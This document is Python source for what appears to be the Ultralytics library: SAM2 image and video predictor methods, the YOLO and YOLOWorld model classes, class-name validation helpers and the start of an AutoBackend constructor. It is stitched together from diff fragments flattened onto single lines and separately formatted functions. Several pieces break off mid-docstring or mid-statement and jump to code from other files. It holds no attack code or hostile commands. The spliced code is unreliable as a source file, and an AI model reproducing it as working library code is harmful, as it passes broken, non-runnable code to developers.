+ + Args: + image (str | np.ndarray): Path to the image file as a string, or a numpy array representing the image. + + Raises: + AssertionError: If more than one image is attempted to be set. + + Examples: + >>> predictor = SAM2Predictor() + >>> predictor.set_image("path/to/image.jpg") + >>> predictor.set_image(np.array([...])) # Using a numpy array + + Notes: + - This method must be called before performing any inference on a new image. + - The method caches the extracted features for efficient subsequent inferences on the same image. + - Only one image can be set at a time. To process multiple images, call this method for each new image. + """ + if self.model is None: + self.setup_model(model=None) + self.setup_source(image) + assert len(self.dataset) == 1, "`set_image` only supports setting one image!" + for batch in self.dataset: + im = self.preprocess(batch[1]) + self.features = self.get_im_features(im) + break + + def get_im_features(self, im): + """Extracts image features from the SAM image encoder for subsequent processing.""" + assert ( + isinstance(self.imgsz, (tuple, list)) and self.imgsz[0] == self.imgsz[1] + ), f"SAM 2 models only support square image size, but got {self.imgsz}." + self.model.set_imgsz(self.imgsz) + self._bb_feat_sizes = [[x // (4 * i) for x in self.imgsz] for i in [1, 2, 4]] + + backbone_out = self.model.forward_image(im) + _, vision_feats, _, _ = self.model._prepare_backbone_features(backbone_out) + if self.model.directly_add_no_mem_embed: + vision_feats[-1] = vision_feats[-1] + self.model.no_mem_embed + feats = [ + feat.permute(1, 2, 0).view(1, -1, *feat_size) + for feat, feat_size in zip(vision_feats[::-1], self._bb_feat_sizes[::-1]) + ][::-1] + return {"image_embed": feats[-1], "high_res_feats": feats[:-1]} + + +class SAM2VideoPredictor(SAM2Predictor): + """ + SAM2VideoPredictor to handle user interactions with videos and manage inference states. 
def __init__(self, cfg=DEFAULT_CFG, overrides=None, _callbacks=None):
    """
    Set up the video predictor: base-class initialization, default flags and state initialization hook.

    After the base constructor runs, the inference state starts out empty, non-overlapping masks are
    enabled, both "clear non-conditioning memory" options are disabled, and `init_state` is appended to
    the "on_predict_start" callbacks.

    Args:
        cfg (Dict): Default configuration forwarded to the base predictor.
        overrides (Dict | None): Configuration overrides forwarded to the base predictor.
        _callbacks (Dict | None): Callbacks forwarded to the base predictor.

    Examples:
        >>> predictor = SAM2VideoPredictor(cfg=DEFAULT_CFG)
        >>> predictor = SAM2VideoPredictor(overrides={"imgsz": 640})
    """
    super().__init__(cfg, overrides, _callbacks)

    # Filled lazily by `init_state`; an empty dict means "not initialized yet".
    self.inference_state = dict()
    self.non_overlap_masks = True
    self.clear_non_cond_mem_around_input = self.clear_non_cond_mem_for_multi_obj = False

    start_hooks = self.callbacks["on_predict_start"]
    start_hooks.append(self.init_state)
+ """ + # Override prompts if any stored in self.prompts + bboxes = self.prompts.pop("bboxes", bboxes) + points = self.prompts.pop("points", points) + masks = self.prompts.pop("masks", masks) + + frame = self.dataset.frame + self.inference_state["im"] = im + output_dict = self.inference_state["output_dict"] + if len(output_dict["cond_frame_outputs"]) == 0: # initialize prompts + points, labels, masks = self._prepare_prompts(im.shape[2:], bboxes, points, labels, masks) + if points is not None: + for i in range(len(points)): + self.add_new_prompts(obj_id=i, points=points[[i]], labels=labels[[i]], frame_idx=frame) + elif masks is not None: + for i in range(len(masks)): + self.add_new_prompts(obj_id=i, masks=masks[[i]], frame_idx=frame) + self.propagate_in_video_preflight() + + consolidated_frame_inds = self.inference_state["consolidated_frame_inds"] + batch_size = len(self.inference_state["obj_idx_to_id"]) + if len(output_dict["cond_frame_outputs"]) == 0: + raise RuntimeError("No points are provided; please add points first") + + if frame in consolidated_frame_inds["cond_frame_outputs"]: + storage_key = "cond_frame_outputs" + current_out = output_dict[storage_key][frame] + if self.clear_non_cond_mem_around_input and (self.clear_non_cond_mem_for_multi_obj or batch_size <= 1): + # clear non-conditioning memory of the surrounding frames + self._clear_non_cond_mem_around_input(frame) + elif frame in consolidated_frame_inds["non_cond_frame_outputs"]: + storage_key = "non_cond_frame_outputs" + current_out = output_dict[storage_key][frame] + else: + storage_key = "non_cond_frame_outputs" + current_out = self._run_single_frame_inference( + output_dict=output_dict, + frame_idx=frame, + batch_size=batch_size, + is_init_cond_frame=False, + point_inputs=None, + mask_inputs=None, + reverse=False, + run_mem_encoder=True, + ) + output_dict[storage_key][frame] = current_out + # Create slices of per-object outputs for subsequent interaction with each + # individual object after 
@smart_inference_mode()
def add_new_prompts(
    self,
    obj_id,
    points=None,
    labels=None,
    masks=None,
    frame_idx=0,
):
    """
    Adds a point or mask prompt for one object on one frame and runs single-frame inference for it.

    The prompt is stored in the inference state (replacing any prompt of the other kind stored for the
    same object and frame), the object is run through `_run_single_frame_inference` without the memory
    encoder, and the result is kept in the object's temporary outputs until
    `propagate_in_video_preflight` consolidates it.

    Args:
        obj_id (int): Client-side id of the object the prompt belongs to.
        points (torch.Tensor, optional): Point coordinates for the object. Defaults to None.
        labels (torch.Tensor, optional): Labels matching `points`. Defaults to None.
        masks (torch.Tensor, optional): Mask prompt for the object. Defaults to None.
        frame_idx (int, optional): Frame the prompt applies to. Defaults to 0.

    Returns:
        (torch.Tensor): Consolidated mask logits for all objects on this frame with the first two
            dimensions merged, i.e. one (H, W) map per object.
        (torch.Tensor): A tensor of ones with one entry per returned mask.

    Raises:
        AssertionError: If both `masks` and `points` are given, or neither is.

    Note:
        - A frame that has not been tracked yet is treated as an initial conditioning frame.
        - The memory encoder is skipped here; it runs later in `propagate_in_video_preflight`.
    """
    assert (masks is None) ^ (points is None), "'masks' and 'points' prompts are not compatible with each other."
    obj_idx = self._obj_id_to_idx(obj_id)
    state = self.inference_state

    # Store the new prompt and drop any prompt of the other kind on this object/frame, so a frame never
    # carries both point and mask inputs for the same object.
    point_inputs = None
    if points is not None:
        point_inputs = {"point_coords": points, "point_labels": labels}
        state["point_inputs_per_obj"][obj_idx][frame_idx] = point_inputs
        state["mask_inputs_per_obj"][obj_idx].pop(frame_idx, None)
    else:
        state["mask_inputs_per_obj"][obj_idx][frame_idx] = masks
        state["point_inputs_per_obj"][obj_idx].pop(frame_idx, None)

    # If this frame hasn't been tracked before, treat it as an initial conditioning frame: the prompt
    # generates a segment without memory from other frames. Otherwise the prompt corrects the masks
    # that were already tracked on this frame.
    is_init_cond_frame = frame_idx not in state["frames_already_tracked"]
    obj_output_dict = state["output_dict_per_obj"][obj_idx]
    obj_temp_output_dict = state["temp_output_dict_per_obj"][obj_idx]
    # A frame is a conditioning frame if it is an initial one, or if the model treats every corrected
    # frame as conditioning.
    is_cond = is_init_cond_frame or self.model.add_all_frames_to_correct_as_cond
    storage_key = "cond_frame_outputs" if is_cond else "non_cond_frame_outputs"

    # For point prompts, feed the most recent mask logits of this object back into the decoder. The
    # temporary outputs hold the latest result; fall back to the consolidated per-object outputs.
    prev_sam_mask_logits = None
    if point_inputs is not None:
        prev_out = (
            obj_temp_output_dict[storage_key].get(frame_idx)
            or obj_output_dict["cond_frame_outputs"].get(frame_idx)
            or obj_output_dict["non_cond_frame_outputs"].get(frame_idx)
        )
        if prev_out is not None and prev_out.get("pred_masks") is not None:
            prev_sam_mask_logits = prev_out["pred_masks"].to(device=self.device, non_blocking=True)
            # Clamp to avoid rare numerical issues. This is done out of place because `.to()` returns
            # the stored tensor itself when it already lives on `self.device`, and an in-place clamp
            # would silently rewrite the saved output.
            prev_sam_mask_logits = prev_sam_mask_logits.clamp(-32.0, 32.0)

    current_out = self._run_single_frame_inference(
        output_dict=obj_output_dict,  # run on the slice of a single object
        frame_idx=frame_idx,
        batch_size=1,  # run on the slice of a single object
        is_init_cond_frame=is_init_cond_frame,
        point_inputs=point_inputs,
        mask_inputs=masks,
        reverse=False,
        # The memory encoder is deferred to `propagate_in_video_preflight` so that non-overlapping
        # constraints can be enforced across all objects before they are encoded into memory.
        run_mem_encoder=False,
        prev_sam_mask_logits=prev_sam_mask_logits,
    )
    # Keep the output as a temporary result (to be used as future memory once consolidated).
    obj_temp_output_dict[storage_key][frame_idx] = current_out

    # Combine the temporary outputs of all objects on this frame into one batch.
    consolidated_out = self._consolidate_temp_output_across_obj(
        frame_idx,
        is_cond=is_cond,
        run_mem_encoder=False,
    )
    # Merge the first two dimensions exactly once: flattening a second time would fold the object
    # axis into the mask height. Scores get one entry per mask, matching `inference`.
    pred_masks = consolidated_out["pred_masks"].flatten(0, 1)
    return pred_masks, torch.ones(len(pred_masks), dtype=pred_masks.dtype, device=pred_masks.device)
+ consolidated_frame_inds = self.inference_state["consolidated_frame_inds"] + for is_cond in {False, True}: + # Separately consolidate conditioning and non-conditioning temp outptus + storage_key = "cond_frame_outputs" if is_cond else "non_cond_frame_outputs" + # Find all the frames that contain temporary outputs for any objects + # (these should be the frames that have just received clicks for mask inputs + # via `add_new_points` or `add_new_mask`) + temp_frame_inds = set() + for obj_temp_output_dict in temp_output_dict_per_obj.values(): + temp_frame_inds.update(obj_temp_output_dict[storage_key].keys()) + consolidated_frame_inds[storage_key].update(temp_frame_inds) + # consolidate the temporary output across all objects on this frame + for frame_idx in temp_frame_inds: + consolidated_out = self._consolidate_temp_output_across_obj( + frame_idx, is_cond=is_cond, run_mem_encoder=True + ) + # merge them into "output_dict" and also create per-object slices + output_dict[storage_key][frame_idx] = consolidated_out + self._add_output_per_object(frame_idx, consolidated_out, storage_key) + if self.clear_non_cond_mem_around_input and (self.clear_non_cond_mem_for_multi_obj or batch_size <= 1): + # clear non-conditioning memory of the surrounding frames + self._clear_non_cond_mem_around_input(frame_idx) + + # clear temporary outputs in `temp_output_dict_per_obj` + for obj_temp_output_dict in temp_output_dict_per_obj.values(): + obj_temp_output_dict[storage_key].clear() + + # edge case: if an output is added to "cond_frame_outputs", we remove any prior + # output on the same frame in "non_cond_frame_outputs" + for frame_idx in output_dict["cond_frame_outputs"]: + output_dict["non_cond_frame_outputs"].pop(frame_idx, None) + for obj_output_dict in self.inference_state["output_dict_per_obj"].values(): + for frame_idx in obj_output_dict["cond_frame_outputs"]: + obj_output_dict["non_cond_frame_outputs"].pop(frame_idx, None) + for frame_idx in 
@staticmethod
def init_state(predictor):
    """
    Create the empty per-video inference state on `predictor`, unless it already has one.

    The state is a plain dict holding the prompt inputs, the id/index mappings, the tracking outputs
    (consolidated, per object and temporary) and tracking metadata. A predictor whose
    `inference_state` is non-empty is left untouched.

    Args:
        predictor (SAM2VideoPredictor): Predictor whose `inference_state` is initialized. Its `dataset`
            must be set and be in "video" mode.

    Raises:
        AssertionError: If `predictor.dataset` is None or its mode is not "video".
    """
    already_initialized = len(predictor.inference_state) > 0
    if already_initialized:
        return
    assert predictor.dataset is not None
    assert predictor.dataset.mode == "video"

    predictor.inference_state = {
        "num_frames": predictor.dataset.frames,
        # prompt inputs received on each frame, keyed by object index
        "point_inputs_per_obj": {},
        "mask_inputs_per_obj": {},
        # values that don't change across frames, so a single copy is enough
        "constants": {},
        # two-way mapping between client-side object ids and model-side object indices
        "obj_id_to_idx": OrderedDict(),
        "obj_idx_to_id": OrderedDict(),
        "obj_ids": [],
        # tracking results and states for every frame, each mapping {frame_idx: output}
        "output_dict": {
            "cond_frame_outputs": {},
            "non_cond_frame_outputs": {},
        },
        # per-object slices of the tracking results
        "output_dict_per_obj": {},
        # new outputs produced while the user adds clicks or masks to a frame; merged into
        # "output_dict" before propagation starts
        "temp_output_dict_per_obj": {},
        # frames that already hold consolidated outputs from click or mask inputs
        "consolidated_frame_inds": {
            "cond_frame_outputs": set(),
            "non_cond_frame_outputs": set(),
        },
        # tracking metadata
        "tracking_has_started": False,
        "frames_already_tracked": [],
    }
+ + Args: + im (torch.Tensor): The input image tensor. + batch (int, optional): The batch size for expanding features if there are multiple prompts. Defaults to 1. + + Returns: + vis_feats (torch.Tensor): The visual features extracted from the image. + vis_pos_embed (torch.Tensor): The positional embeddings for the visual features. + feat_sizes (List(Tuple[int])): A list containing the sizes of the extracted features. + + Note: + - If `batch` is greater than 1, the features are expanded to fit the batch size. + - The method leverages the model's `_prepare_backbone_features` method to prepare the backbone features. + """ + backbone_out = self.model.forward_image(im) + if batch > 1: # expand features if there's more than one prompt + for i, feat in enumerate(backbone_out["backbone_fpn"]): + backbone_out["backbone_fpn"][i] = feat.expand(batch, -1, -1, -1) + for i, pos in enumerate(backbone_out["vision_pos_enc"]): + pos = pos.expand(batch, -1, -1, -1) + backbone_out["vision_pos_enc"][i] = pos + _, vis_feats, vis_pos_embed, feat_sizes = self.model._prepare_backbone_features(backbone_out) + return vis_feats, vis_pos_embed, feat_sizes + + def _obj_id_to_idx(self, obj_id): + """ + Map client-side object id to model-side object index. + + Args: + obj_id (int): The unique identifier of the object provided by the client side. + + Returns: + obj_idx (int): The index of the object on the model side. + + Raises: + RuntimeError: If an attempt is made to add a new object after tracking has started. + + Note: + - The method updates or retrieves mappings between object IDs and indices stored in + `inference_state`. + - It ensures that new objects can only be added before tracking commences. + - It maintains two-way mappings between IDs and indices (`obj_id_to_idx` and `obj_idx_to_id`). + - Additional data structures are initialized for the new object to store inputs and outputs. 
+ """ + obj_idx = self.inference_state["obj_id_to_idx"].get(obj_id, None) + if obj_idx is not None: + return obj_idx + + # This is a new object id not sent to the server before. We only allow adding + # new objects *before* the tracking starts. + allow_new_object = not self.inference_state["tracking_has_started"] + if allow_new_object: + # get the next object slot + obj_idx = len(self.inference_state["obj_id_to_idx"]) + self.inference_state["obj_id_to_idx"][obj_id] = obj_idx + self.inference_state["obj_idx_to_id"][obj_idx] = obj_id + self.inference_state["obj_ids"] = list(self.inference_state["obj_id_to_idx"]) + # set up input and output structures for this object + self.inference_state["point_inputs_per_obj"][obj_idx] = {} + self.inference_state["mask_inputs_per_obj"][obj_idx] = {} + self.inference_state["output_dict_per_obj"][obj_idx] = { + "cond_frame_outputs": {}, # dict containing {frame_idx: } + "non_cond_frame_outputs": {}, # dict containing {frame_idx: } + } + self.inference_state["temp_output_dict_per_obj"][obj_idx] = { + "cond_frame_outputs": {}, # dict containing {frame_idx: } + "non_cond_frame_outputs": {}, # dict containing {frame_idx: } + } + return obj_idx + else: + raise RuntimeError( + f"Cannot add new object id {obj_id} after tracking starts. " + f"All existing object ids: {self.inference_state['obj_ids']}. " + f"Please call 'reset_state' to restart from scratch." + ) + + def _run_single_frame_inference( + self, + output_dict, + frame_idx, + batch_size, + is_init_cond_frame, + point_inputs, + mask_inputs, + reverse, + run_mem_encoder, + prev_sam_mask_logits=None, + ): + """ + Run tracking on a single frame based on current inputs and previous memory. + + Args: + output_dict (Dict): The dictionary containing the output states of the tracking process. + frame_idx (int): The index of the current frame. + batch_size (int): The batch size for processing the frame. 
+ is_init_cond_frame (bool): Indicates if the current frame is an initial conditioning frame. + point_inputs (Dict, Optional): Input points and their labels. Defaults to None. + mask_inputs (torch.Tensor, Optional): Input binary masks. Defaults to None. + reverse (bool): Indicates if the tracking should be performed in reverse order. + run_mem_encoder (bool): Indicates if the memory encoder should be executed. + prev_sam_mask_logits (torch.Tensor, Optional): Previous mask logits for the current object. Defaults to None. + + Returns: + current_out (dict): A dictionary containing the output of the tracking step, including updated features and predictions. + + Raises: + AssertionError: If both `point_inputs` and `mask_inputs` are provided, or neither is provided. + + Note: + - The method assumes that `point_inputs` and `mask_inputs` are mutually exclusive. + - The method retrieves image features using the `get_im_features` method. + - The `maskmem_pos_enc` is assumed to be constant across frames, hence only one copy is stored. + - The `fill_holes_in_mask_scores` function is commented out and currently unsupported due to CUDA extension requirements. 
+ """ + # Retrieve correct image features + current_vision_feats, current_vision_pos_embeds, feat_sizes = self.get_im_features( + self.inference_state["im"], batch_size + ) + + # point and mask should not appear as input simultaneously on the same frame + assert point_inputs is None or mask_inputs is None + current_out = self.model.track_step( + frame_idx=frame_idx, + is_init_cond_frame=is_init_cond_frame, + current_vision_feats=current_vision_feats, + current_vision_pos_embeds=current_vision_pos_embeds, + feat_sizes=feat_sizes, + point_inputs=point_inputs, + mask_inputs=mask_inputs, + output_dict=output_dict, + num_frames=self.inference_state["num_frames"], + track_in_reverse=reverse, + run_mem_encoder=run_mem_encoder, + prev_sam_mask_logits=prev_sam_mask_logits, + ) + + maskmem_features = current_out["maskmem_features"] + if maskmem_features is not None: + current_out["maskmem_features"] = maskmem_features.to( + dtype=torch.float16, device=self.device, non_blocking=True + ) + # NOTE: Do not support the `fill_holes_in_mask_scores` function since it needs cuda extensions + # potentially fill holes in the predicted masks + # if self.fill_hole_area > 0: + # pred_masks = current_out["pred_masks"].to(self.device, non_blocking=True) + # pred_masks = fill_holes_in_mask_scores(pred_masks, self.fill_hole_area) + + # "maskmem_pos_enc" is the same across frames, so we only need to store one copy of it + current_out["maskmem_pos_enc"] = self._get_maskmem_pos_enc(current_out["maskmem_pos_enc"]) + return current_out + + def _get_maskmem_pos_enc(self, out_maskmem_pos_enc): + """ + Caches and manages the positional encoding for mask memory across frames and objects. + + This method optimizes storage by caching the positional encoding (`maskmem_pos_enc`) for + mask memory, which is constant across frames and objects, thus reducing the amount of + redundant information stored during an inference session. 
def _consolidate_temp_output_across_obj(
    self,
    frame_idx,
    is_cond=False,
    run_mem_encoder=False,
):
    """
    Merge the per-object outputs of one frame into a single batched output dictionary.

    For every tracked object the temporary output for `frame_idx` is used when present; otherwise the
    object's entry in the main per-object outputs (conditioning first, then non-conditioning) is used.
    Objects with no output at all keep placeholder values. With `run_mem_encoder=True` those objects
    additionally receive a dummy object pointer, and the memory encoder is re-run on the merged masks.

    Args:
        frame_idx (int): Index of the frame whose outputs are consolidated.
        is_cond (bool, Optional): Read temporary outputs from "cond_frame_outputs" when True, otherwise from
            "non_cond_frame_outputs". Defaults to False.
        run_mem_encoder (bool, Optional): Re-run the memory encoder on the consolidated masks.
            Defaults to False.

    Returns:
        consolidated_out (dict): Dictionary with keys "maskmem_features", "maskmem_pos_enc", "pred_masks",
            "obj_ptr" and "object_score_logits". The two "maskmem_*" entries stay None unless
            `run_mem_encoder` is True.
    """
    state = self.inference_state
    num_objs = len(state["obj_idx_to_id"])
    storage_key = "cond_frame_outputs" if is_cond else "non_cond_frame_outputs"
    low_res_h, low_res_w = self.imgsz[0] // 4, self.imgsz[1] // 4

    def _constant(shape, value):
        """Create a float32 tensor on the predictor device filled with `value`."""
        return torch.full(size=shape, fill_value=value, dtype=torch.float32, device=self.device)

    # Placeholders: -1024.0 marks a missing object in masks and pointers, while 10.0 as the object score
    # logit means "object present" (sigmoid(10) is ~1). The "maskmem_*" entries are filled further below.
    consolidated_out = {
        "maskmem_features": None,
        "maskmem_pos_enc": None,
        "pred_masks": _constant((num_objs, 1, low_res_h, low_res_w), -1024.0),
        "obj_ptr": _constant((num_objs, self.model.hidden_dim), -1024.0),
        "object_score_logits": _constant((num_objs, 1), 10.0),
    }

    for obj_idx in range(num_objs):
        temp_outputs = state["temp_output_dict_per_obj"][obj_idx]
        main_outputs = state["output_dict_per_obj"][obj_idx]
        # Prefer the temporary output, then fall back to previously committed outputs of either kind
        out = (
            temp_outputs[storage_key].get(frame_idx)
            or main_outputs["cond_frame_outputs"].get(frame_idx)
            or main_outputs["non_cond_frame_outputs"].get(frame_idx)
        )
        row = slice(obj_idx, obj_idx + 1)
        if out is not None:
            consolidated_out["pred_masks"][row] = out["pred_masks"]
            consolidated_out["obj_ptr"][row] = out["obj_ptr"]
        elif run_mem_encoder:
            # No input or tracking result for this object on this frame: keep the placeholder mask and
            # use a pointer derived from an empty mask (only needed when memory is being built)
            consolidated_out["obj_ptr"][row] = self._get_empty_mask_ptr(frame_idx)

    if not run_mem_encoder:
        return consolidated_out

    # Upsample the merged masks, optionally enforce non-overlap, then re-encode the memory
    high_res_masks = F.interpolate(
        consolidated_out["pred_masks"],
        size=self.imgsz,
        mode="bilinear",
        align_corners=False,
    )
    if self.model.non_overlap_masks_for_mem_enc:
        high_res_masks = self.model._apply_non_overlapping_constraints(high_res_masks)
    features, pos_enc = self._run_memory_encoder(
        batch_size=num_objs,
        high_res_masks=high_res_masks,
        is_mask_from_pts=True,  # these frames are what the user interacted with
        object_score_logits=consolidated_out["object_score_logits"],
    )
    consolidated_out["maskmem_features"] = features
    consolidated_out["maskmem_pos_enc"] = pos_enc
    return consolidated_out
def _get_empty_mask_ptr(self, frame_idx):
    """
    Compute a placeholder object pointer by tracking an all-zero mask on the current image.

    Args:
        frame_idx (int): Index of the frame the dummy pointer is generated for.

    Returns:
        (torch.Tensor): The "obj_ptr" entry returned by the model's `track_step` for the empty mask.
    """
    # Features of the image currently held in the inference state
    vision_feats, vision_pos_embeds, feat_sizes = self.get_im_features(self.inference_state["im"])

    # A single-object mask of zeros at full image size stands in for "no object"
    empty_mask = torch.zeros((1, 1, *self.imgsz), dtype=torch.float32, device=self.device)

    step_out = self.model.track_step(
        frame_idx=frame_idx,
        is_init_cond_frame=True,
        current_vision_feats=vision_feats,
        current_vision_pos_embeds=vision_pos_embeds,
        feat_sizes=feat_sizes,
        point_inputs=None,
        mask_inputs=empty_mask,
        output_dict={},
        num_frames=self.inference_state["num_frames"],
        track_in_reverse=False,
        run_mem_encoder=False,
        prev_sam_mask_logits=None,
    )
    return step_out["obj_ptr"]
def _run_memory_encoder(self, batch_size, high_res_masks, object_score_logits, is_mask_from_pts):
    """
    Encode the given high-resolution masks into memory features for the current image.

    Typically used after non-overlapping constraints changed the object scores, so the memory derived from
    them has to be recomputed.

    Args:
        batch_size (int): Batch size passed on to `get_im_features` for the current image.
        high_res_masks (torch.Tensor): High-resolution masks to encode.
        object_score_logits (torch.Tensor): Object score logits forwarded to the memory encoder.
        is_mask_from_pts (bool): Whether the masks originate from point interactions.

    Returns:
        (tuple): The encoded mask features cast to float16 on the predictor device, and the positional
            encoding after it has passed through `_get_maskmem_pos_enc`.
    """
    # Features of the image currently held in the inference state (positional embeddings are not needed)
    vision_feats, _, feat_sizes = self.get_im_features(self.inference_state["im"], batch_size)
    features, pos_enc = self.model._encode_new_memory(
        current_vision_feats=vision_feats,
        feat_sizes=feat_sizes,
        pred_masks_high_res=high_res_masks,
        is_mask_from_pts=is_mask_from_pts,
        object_score_logits=object_score_logits,
    )

    # The positional encoding is shared across frames, so route it through the session cache
    pos_enc = self._get_maskmem_pos_enc(pos_enc)
    features = features.to(dtype=torch.float16, device=self.device, non_blocking=True)
    return features, pos_enc
def _add_output_per_object(self, frame_idx, current_out, storage_key):
    """
    Slice a batched multi-object output into per-object entries and store them per object.

    Each object receives the `[obj_idx : obj_idx + 1]` slice of every tensor, stored under
    `self.inference_state["output_dict_per_obj"][obj_idx][storage_key][frame_idx]`. The slices are views that
    share storage with the tensors in `current_out`.

    Args:
        frame_idx (int): Index of the current frame.
        current_out (Dict): Batched output with keys "maskmem_features" (tensor or None), "maskmem_pos_enc"
            (list of tensors or None), "pred_masks" and "obj_ptr".
        storage_key (str): Key of the per-object sub-dictionary that receives the entry.
    """
    features = current_out["maskmem_features"]
    assert features is None or isinstance(features, torch.Tensor)

    pos_enc = current_out["maskmem_pos_enc"]
    assert pos_enc is None or isinstance(pos_enc, list)

    for obj_idx, per_obj_outputs in self.inference_state["output_dict_per_obj"].items():
        sel = slice(obj_idx, obj_idx + 1)  # keeps the leading object dimension
        per_obj_outputs[storage_key][frame_idx] = {
            "maskmem_features": None if features is None else features[sel],
            "maskmem_pos_enc": None if pos_enc is None else [enc[sel] for enc in pos_enc],
            "pred_masks": current_out["pred_masks"][sel],
            "obj_ptr": current_out["obj_ptr"][sel],
        }
def _clear_non_cond_mem_around_input(self, frame_idx):
    """
    Drop non-conditioning memory entries in a window centred on the interacted frame.

    After correction clicks, nearby non-conditioning memories may still describe the object's outdated
    appearance. Removing them keeps the model from seeing old and new information at the same time.

    Args:
        frame_idx (int): Index of the frame where the user interaction occurred.
    """
    # Window half-width: temporal stride times the number of mask memories
    half_window = self.model.memory_temporal_stride_for_eval * self.model.num_maskmem
    for t in range(frame_idx - half_window, frame_idx + half_window + 1):
        state = self.inference_state
        # Remove from the shared output dict and from every per-object output dict
        state["output_dict"]["non_cond_frame_outputs"].pop(t, None)
        for per_obj_outputs in state["output_dict_per_obj"].values():
            per_obj_outputs["non_cond_frame_outputs"].pop(t, None)
class YOLO(Model):
    """YOLO (You Only Look Once) object detection model."""

    def __init__(self, model="yolo11n.pt", task=None, verbose=False):
        """
        Initialize a YOLO model, turning into a YOLOWorld instance for '-world' model files.

        Args:
            model (str | Path): Model file name or path. A stem containing '-world' together with a
                '.pt', '.yaml' or '.yml' suffix selects YOLOWorld.
            task (str | None): Task passed to the base `Model` initializer (unused for YOLOWorld).
            verbose (bool): Verbosity flag forwarded to the selected initializer.
        """
        weights_path = Path(model)
        is_world = "-world" in weights_path.stem and weights_path.suffix in {".pt", ".yaml", ".yml"}
        if not is_world:
            # Regular YOLO initialization
            super().__init__(model=model, task=task, verbose=verbose)
            return

        # Build a YOLOWorld model and adopt both its class and its state
        world = YOLOWorld(weights_path, verbose=verbose)
        self.__class__ = type(world)
        self.__dict__ = world.__dict__

    @property
    def task_map(self):
        """Map each task name to its model, trainer, validator, and predictor classes."""
        classify, detect, segment, pose, obb = yolo.classify, yolo.detect, yolo.segment, yolo.pose, yolo.obb
        return {
            "classify": dict(
                model=ClassificationModel,
                trainer=classify.ClassificationTrainer,
                validator=classify.ClassificationValidator,
                predictor=classify.ClassificationPredictor,
            ),
            "detect": dict(
                model=DetectionModel,
                trainer=detect.DetectionTrainer,
                validator=detect.DetectionValidator,
                predictor=detect.DetectionPredictor,
            ),
            "segment": dict(
                model=SegmentationModel,
                trainer=segment.SegmentationTrainer,
                validator=segment.SegmentationValidator,
                predictor=segment.SegmentationPredictor,
            ),
            "pose": dict(
                model=PoseModel,
                trainer=pose.PoseTrainer,
                validator=pose.PoseValidator,
                predictor=pose.PosePredictor,
            ),
            "obb": dict(
                model=OBBModel,
                trainer=obb.OBBTrainer,
                validator=obb.OBBValidator,
                predictor=obb.OBBPredictor,
            ),
        }
class YOLOWorld(Model):
    """YOLO-World object detection model."""

    def __init__(self, model="yolov8s-world.pt", verbose=False) -> None:
        """
        Initialize YOLOv8-World model with a pre-trained model file.

        Loads a YOLOv8-World model for object detection. If the loaded model has no `names` attribute, the
        class names from the bundled `cfg/datasets/coco8.yaml` are assigned.

        Args:
            model (str | Path): Path to the pre-trained model file. Supports *.pt and *.yaml formats.
            verbose (bool): If True, prints additional information during initialization.
        """
        super().__init__(model=model, task="detect", verbose=verbose)

        # Assign default COCO class names when there are no custom names
        if not hasattr(self.model, "names"):
            self.model.names = yaml_load(ROOT / "cfg/datasets/coco8.yaml").get("names")

    @property
    def task_map(self):
        """Map head to model, validator, predictor, and trainer classes."""
        return {
            "detect": {
                "model": WorldModel,
                "validator": yolo.detect.DetectionValidator,
                "predictor": yolo.detect.DetectionPredictor,
                "trainer": yolo.world.WorldTrainer,
            }
        }

    def set_classes(self, classes):
        """
        Set the classes the model should detect.

        The full `classes` sequence (including an optional background entry) is handed to the underlying
        model. The stored class names omit the first background entry (a single space), if present.

        Args:
            classes (list[str]): A list of categories i.e. ["person"]. The sequence is not modified.
        """
        self.model.set_classes(classes)

        # Work on a copy: removing the background entry must not mutate the caller's sequence, and the
        # stored names must not alias it (this also makes tuples acceptable input).
        background = " "
        names = list(classes)
        if background in names:
            names.remove(background)
        self.model.names = names

        # Keep an existing predictor in sync instead of resetting it, otherwise the old names would remain
        if self.predictor:
            self.predictor.model.names = names
def check_class_names(names):
    """
    Validate and normalize class names.

    Lists are converted to `{index: name}` dicts. Dict keys are converted to int and values to str. The
    resulting indices must be exactly 0..n-1. ImageNet class codes (names starting with 'n0') are mapped to
    human-readable names using the `map` entry of `cfg/datasets/ImageNet.yaml`.

    Args:
        names (list | dict | Any): Class names as a list, a dict keyed by class index, or any other object.

    Returns:
        (dict | Any): The normalized `{int: str}` dict. An empty list or dict yields an empty dict, and
            inputs that are neither list nor dict are returned unchanged.

    Raises:
        KeyError: If any class index is negative or not smaller than the number of classes.
    """
    if isinstance(names, list):  # names is a list
        names = dict(enumerate(names))  # convert to dict
    if isinstance(names, dict):
        # Convert 1) string keys to int, i.e. '0' to 0, and non-string values to strings, i.e. True to 'True'
        names = {int(k): str(v) for k, v in names.items()}
        if not names:  # nothing to validate; min()/max() would raise ValueError on an empty dict
            return names
        n = len(names)
        lowest, highest = min(names), max(names)
        # n distinct integer keys within [0, n) are necessarily 0..n-1, so index 0 exists below
        if lowest < 0 or highest >= n:
            raise KeyError(
                f"{n}-class dataset requires class indices 0-{n - 1}, but you have invalid class indices "
                f"{lowest}-{highest} defined in your dataset YAML."
            )
        if names[0].startswith("n0"):  # imagenet class codes, i.e. 'n01440764'
            names_map = yaml_load(ROOT / "cfg/datasets/ImageNet.yaml")["map"]  # human-readable names
            names = {k: names_map[v] for k, v in names.items()}
    return names
def default_class_names(data=None):
    """
    Return class names from a dataset YAML, or 999 generic names when none can be loaded.

    Args:
        data (str | Path | None): Dataset YAML to read the `names` entry from. Falsy values skip loading.

    Returns:
        (Any): The `names` entry of the YAML if it loads successfully, otherwise a dict mapping
            0..998 to 'class0'..'class998'.
    """
    if data:
        try:
            loaded = yaml_load(check_yaml(data))["names"]
        except Exception:
            pass  # best effort: any failure falls through to the generic names
        else:
            return loaded
    return {idx: f"class{idx}" for idx in range(999)}  # return default if above errors
@torch.no_grad()
def __init__(
    self,
    weights="yolo11n.pt",
    device=torch.device("cpu"),
    dnn=False,
    data=None,
    fp16=False,
    batch=1,
    fuse=True,
    verbose=True,
):
    """
    Initialize the AutoBackend for inference.

    The model format is detected from the weights path via `self._model_type`, the matching runtime is
    loaded, optional metadata (stride, task, batch, imgsz, names, kpt_shape) is applied, and class names
    are validated.

    Args:
        weights (str | torch.nn.Module): Path to the model weights file or a module instance. Defaults to 'yolo11n.pt'.
        device (torch.device): Device to run the model on. Defaults to CPU.
        dnn (bool): Use OpenCV DNN module for ONNX inference. Defaults to False.
        data (str | Path | optional): Path to the additional data.yaml file containing class names. Optional.
        fp16 (bool): Enable half-precision inference. Supported only on specific backends. Defaults to False.
        batch (int): Batch-size to assume for inference.
